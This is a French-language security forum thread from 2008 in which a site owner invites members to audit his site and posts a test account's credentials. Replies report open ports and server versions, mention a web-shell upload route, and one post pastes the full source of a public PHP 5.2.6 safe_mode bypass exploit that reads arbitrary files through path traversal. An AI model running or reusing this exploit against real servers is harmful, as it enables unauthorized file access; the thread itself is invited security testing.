TESTER MON SITE http://nopinjection.com

Nos experts testeront vos sites avec attention.
Postez ici vos liens. Et fournissez les accès de bases (login et mot de passe 'simple utilisateur' par exemple si vous souhaitez voir ce qu'un utilisateur peux exploiter)

Moderators: Mod, Mod, Mod

TESTER MON SITE http://nopinjection.com

Postby JTC » Wed Aug 27, 2008 6:29 pm

Après toutes les sécurités mises , je voudrais savoir si vous arrivez à trouver une faille coté serveur ou web de mon site:


http://nopinjection.com


Bien cordialement :D
Last edited by JTC on Wed Aug 27, 2008 6:59 pm, edited 1 time in total.
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm


Postby JTC » Wed Aug 27, 2008 6:47 pm

J'ai mit " à tester" au début de ma présentation en tant que moderateur : http://nopinjection.com/nopinjection/index.php?topic=163.msg220#msg220


mon co admin (stargate master) n'est pas la pour l'instant
et je n'ai plus accès au site pour résond de sécuriter.

Si ca vous suffit pas , a son retour je peux lui dire que creer la page avec 'a tester' dedans

Voila j'attend vos reponses


Julien! :)
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby JTC » Wed Aug 27, 2008 6:58 pm

bon voila la page est ici : http://nopinjection.com/test.html

regarder le code source de cette page

MERCI
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby Korigan » Thu Aug 28, 2008 10:58 am

Ok,

Bah on vois ça et on te tiens au courant ^^

Apparemment la précédente attaque serait dû aux avatars :/

Bon bah j'me créer un compte ce soir pour essayer, sinon si tu en as un de test pour les fainéant qui voudront essayer :P

++Korigan
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby JTC » Thu Aug 28, 2008 11:28 am

Voila 8)

http://nopinjection.com/nopinjection/index.php?action=login

login : faignant
password: azertyuiop


ps: Invite les meilleurs chercheurs de vulnz qui se trouve sur http://forum.hackbbs.org ou autre stp à se rendre sur ce topic ! Merci

Bien Cordialement à tous
Et bonne recherches
ps: tous est à jour sauf apache qui est l'avant version final mais n'ayant aucune faille .
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby Korigan » Thu Aug 28, 2008 2:35 pm

Oyé oyé.

Bon, je reviens du front là et il y a peut etre une piste.

Donc SMF 1.1.5 contient effectivement des failles dont une permettant l'upload de C99. Il y a dailleur un super tuto sur le net qui explique pas à pas comment faire. :/

Par ailleur, un scan de ta machine montre les port d'apache et de mysql ouvert.

Toute tentative de connection sur le port mysql est veine, il ne semble pas accepter les ip extérieure à ton réseau, ce qui est une bonne chose ^^

Pour ce qui est d'apache, sa version serait 2.2.8 (Win32) et PHP 5.2.6

Donc il existe de nombreuse faille pour Apache 2.2.x mais 2.2.8 était une version conseillé, à voir si c'est suffisant ^^

Cf: http://www.saintcorporation.com/cgi-bin/demo_tut.pl?tutorial_name=Apache_vulnerabilities.html&fact_color=&tag=

Avec un phpinfo() tu sera à même de voir directement par toi même si tu utilises l'un des modules faillible. Sinon il faudra les tester ^^

Si quelqu'un veux s'occuper de PHP 5.2.6 pendant ce temps cela nous ferait gagner du temps.

Bon biensur SMF semble vulnérable au flood et autre DoS, je ne vois aucun captcha ou protection particulière d'installé. Mais je ne pense pas qu'en postant ici ce soit le genre de faille que tu veule que l'on trouve ^^

Bref...affaire à suivre et merci pour le compte de test, sans lui j'aurais attendu kk heures de plus ^^

Voici un exploit pour PHP 5.2.6, pas encore testé, mais faut voir...


[code:1:4612ae874e]
<?php
/*
Exploit for CVE-2008-2666:
http://securityreason.com/achievement_securityalert/55

Orginal URL
http://securityreason.com/achievement_exploitalert/10

safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://securityreason.com
cxib [at] securityreason [dot] com

How to fix?
Do not use safe_mode as a main safety
*/

eCHo "<PRE><P>This is exploit from <a
href=\"http://securityreason.com\">http://securityreason.com</a>
Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode
bypass<p>More: <a
href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/ne
ws/0/0x24</a><p><form name=\"form\"
action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\"
value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\"
value=\"Show\"></form>\n";

if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this
requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http:
directory</b>");
mkDIR("http:");
}

if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file']))
diE("\n".$karatonik);

if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];


if((curl_exec(curl_init("file:http://../../../../../../../../../../../../..
/../../../../../../../../../../../../../../../../../../../../".$file))) aNd
!emptY($file)) die("<B><br>best regards cxib from
securityreason.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have
permissions.</CENTER></FONT>");

?>
[/code:1:4612ae874e]
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby JTC » Thu Aug 28, 2008 2:56 pm

smf 1.1.5 n'est pas vulnérable désolé tu dois faire erreur sur une autre version de smf :)
mais si tu es sur, donne moi la source de la vulnz en question!

édit:[b:3460215fd7] Bon bien sur SMF semble vulnérable au flood et autre DoS, je ne vois aucun captcha ou protection particulière installées[/b:3460215fd7]

mardi soir on a resisté a des centaines de bots attaquant le forum :) donc.. ^^
On dispose d'un bon firewall , un mod security evasive je crois et un excellent script php anti ddos !



à part ça merci :) ! si tu peux tester l'exploit ou quelq'un d'autres ca serais sympas !



Bien Cordialement :D
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby JTC » Thu Aug 28, 2008 3:06 pm

ps: on a interdit l'écriture dans le répertoire du site donc pas d'uploade de shell et d'avatar

mais je veux quand meme voir ce tuto car je suis ceptique
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby STARGATEMASTER » Thu Aug 28, 2008 3:29 pm

Salut,

Je suis Stargatemaster Administrateur et hébergeur de nopinjection.com

Coté smf l'uplode d'avatar et d'attachement est désactivé.

Effectivement le port mysql est inacsesible de l'extérieur.

Pour apache je suis content d'entandre que la version 2.2.8 est conseiller.

Et si l'exploit PHP 5.2.6 est un script php je crois pas que je vais le mettre sur mon serveur par expires lol. :D

Le smf est vulnérable au flood car on ne posède pas de captcha effectivement mais si sa arrive on remet la backup de la veille car je fais une backup le matin et une le soir.
STARGATEMASTER
Projets
 
Posts: 2
Joined: Thu Aug 28, 2008 3:12 pm

Éviter les attaques par force brute

Postby NETTOYEUR25 » Thu Aug 28, 2008 5:22 pm

Bonjour, voilà un tuto qui sera surement utile, suivre le lien ci-dessous :

http://www.siteduzero.com/tutoriel-3-34510-eviter-les-attaques-par-force-brute.html
User avatar
NETTOYEUR25
Projets
 
Posts: 1235
Joined: Wed Oct 31, 2007 2:20 am
Location: B

Postby Korigan » Thu Aug 28, 2008 7:21 pm

Ok ça marche ^^

Par contre ce serait bien de masquer tout ça.

Pour l'instant tout vas peut etre bien, mais d'ici quelques mois rien ne nous garantis que de nouveaux exploits ne vont pas être trouvé contre ces versions.

Ce serait peut être bien de les altérer, histoire de rendre la vie plus difficile aux éventuel asaillants ^^

Bon, l'audit continue ^^
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby JTC » Thu Aug 28, 2008 7:36 pm

j'attent toujour ta source du hack smf 1.1.5 :)
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby darksuncloud » Fri Aug 29, 2008 8:16 am

Est-ce vraiment necessaire d'envoyer par mp un lien vers ce toipic a tout le monde?
User avatar
darksuncloud
Projets
 
Posts: 311
Joined: Mon Oct 15, 2007 7:57 pm

Postby Korigan » Fri Aug 29, 2008 10:20 am

Comment ça darksuncloud?

Non effectivement, cela n'a jamais été fais car chacun à ses préoccupations.


JTC: Voici le lien sur lequel j'était tombé, http://www.devside.net/blog/smf-exploit-like-phpbb-hack
Mais il ne doit pas s'appliquer à la 1.1.5, certainement à une version antérieur à la 1.1.4

Merci de ne pas troller sur les autres topics ni de dérenger tout le monde si tel est le cas ;)

++Korigan
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Next

Return to Faites tester vos sites <b>DE TEST</b>

Who is online

Users browsing this forum: No registered users and 2 guests

cron